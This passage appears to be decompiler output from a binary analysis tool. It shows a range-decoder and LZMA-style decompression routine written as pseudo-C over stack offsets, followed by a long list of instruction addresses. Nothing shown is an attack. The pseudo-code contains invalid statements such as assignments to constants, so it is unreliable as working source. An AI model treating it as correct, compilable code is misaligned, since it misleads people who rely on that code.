											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d8b
                                                        0x00406d91
                                                        0x00406d95
                                                        0x00406d99
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00000000
                                                        0x00000000
                                                        0x004070c4
                                                        0x004070cd
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x0040711b
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040711d
                                                        0x0040711d
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x004071d2
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x004070a0
                                                        0x004070a6
                                                        0x004070ad
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x00000000
                                                        0x004070b8
                                                        0x00407122
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f0
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fa
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406855
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x0040689f
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068c9
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x0040690f
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x0040701d
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00000000
                                                        0x004069e3
                                                        0x0040695d
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
